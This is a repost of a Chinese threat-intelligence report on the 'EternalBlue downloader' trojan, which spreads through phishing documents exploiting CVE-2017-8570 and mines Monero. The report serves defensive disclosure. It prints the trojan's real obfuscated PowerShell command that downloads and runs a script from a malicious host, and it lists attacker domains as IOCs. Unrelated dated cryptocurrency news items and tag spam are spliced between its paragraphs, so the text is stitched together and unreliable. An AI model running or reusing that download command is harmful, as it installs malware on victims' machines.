比特幣:“永恒之藍下載器木馬”新增釣魚郵件傳播，利用用戶機器挖礦門羅幣

來源：騰訊御見威脅情報中心

編者注：原標題為《“永恒之藍下載器木馬”新增釣魚郵件傳播，附件含CVE-2017-8570漏洞攻擊代碼》

“永恒之藍”下載器木馬在感染用戶機器上運行后，會自動當前用戶的郵箱通訊錄并發送附件為urgent.doc的文檔，該文檔附帶CVE-2017-8570漏洞攻擊代碼。

如果被攻擊用戶收到郵件并不慎打開文檔，就可能觸發漏洞執行Powershell命令下載mail.jsp：

報告：比特幣價格在減半前超過9.8萬美元礦企才能避免虧損:金色財經報道，據《MadeEasy–Finance》發表的報告指出，盡管RIOT預計到2024年其挖礦能力將增加兩倍，但該公司和比特幣礦工總體上可能會面臨減半帶來的嚴重阻力。當然，BTC區塊獎勵減少50%，礦工的主要收入來源就會減少一半。明年減半之前BTC價格保持在至少98,000美元，公開上市的比特幣挖礦公司才可能避免虧損。

像RIOT這樣的礦商也可以發行新的股票來為他們的運營提供資金。這稀釋了現有的股票，這意味著即使公司的基本基本面得以維持，股價也可能跟不上。盡管公共礦業股在2023年的表現優于比特幣，但發送到交易所的比特幣數量的增加可能預示著勢頭的下降。因此，比特幣價格的大幅上漲才能保證礦工在今天的哈希率水平下保持盈利。[2023/8/4 16:18:42]

C:/Windows/System32/cmd.exe/cpowershellIE`x(Ne`w-Obj`ectNet.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

歐洲央行發布關于數字歐元的第四份進度報告:金色財經報道，歐洲央行（European Central Bank）表示，我們發布了關于數字歐元的第四份進度報告，它包含我們對薪酬模型原則的看法、確保金融包容性的持續工作的最新情況以及我們進行的原型設計工作的結果，今年秋天，我們的管理委員會將審查數字歐元調查階段的結果，然后決定是否進入下一階段。這將包括技術解決方案、業務安排和立法程序后的調整。[2023/7/14 10:55:03]

而下載使用的域名ap35nf7.jp實際上并沒有注冊，但是依然能夠解析到地址：t.awcna.com，是因為被感染機器的本地hosts文件被篡改，使得隨機生成的域名映射到木馬使用的惡意地址，細節請參考御見威脅情報中心此前發布的報告：《“永恒之藍下載器”木馬篡改hosts指向隨機域名，再用多個漏洞攻擊內網挖礦》。

共識層（原ETH2）合約地址余額突破1292萬枚ETH:金色財經消息，據Tokenview鏈上數據監測，當前共識層（原ETH2）合約地址余額達到12,927,685枚ETH，近一周新增49,120枚ETH。[2022/6/21 4:42:18]

本次攻擊過程中，木馬將使用隨機生成的字符加“.cn”或”.jp“或”.kr“后綴作為DGA域名，并在hosts文件中指向域名：

t.tr2q.com,t.awcna.com,t.amynx.com

mail.jsp經過高度混淆，多次解密后可以看到其安裝多個計劃任務下載Powershell腳本執行，并使用了新的計劃任務名：

“Bluetea“藍茶。

“永恒之藍”下載器木馬自出現之后從未停止更新，從最初的PE樣本攻擊到后來轉移為以Powershell無文件攻擊方式躲避查殺，并且通過安裝多個類型的計劃任務進行持久化。在傳播方式上，最初通過供應鏈攻擊積累一批感染機器后，又不斷利用”永恒之藍”漏洞，MSSql爆破，$IPC爆破，RDP爆破等方法進行擴散傳播，近期又增加了DGA域名攻擊和釣魚郵件攻擊，其最終目的只為利用用戶機器挖礦門羅幣獲利。

永恒之藍下載器木馬的歷次版本更新參考下表：

安全建議

1.建議用戶不要輕易打開不明來源的郵件附件，對于郵件附件中的文件要格外謹慎運行，如發現有腳本或其他可執行文件可先使用殺軟件進行掃描；

2.服務器使用安全的密碼策略，特別是IPC$、MSSQL、RDP賬號密碼，切勿使用弱口令，避免遭遇弱密碼爆破攻擊；

3.根據微軟安全公告及時修復Office漏洞CVE-2017-8570，需進行漏洞掃描和修復，或采用WindowsUpdate進行。

IOCs

http//t.awcna.com/mail.jsp

Tags：比特幣ETHCOMPOW比特幣最新價格ETH官網WCOM價格POWERZILLA

火必交易所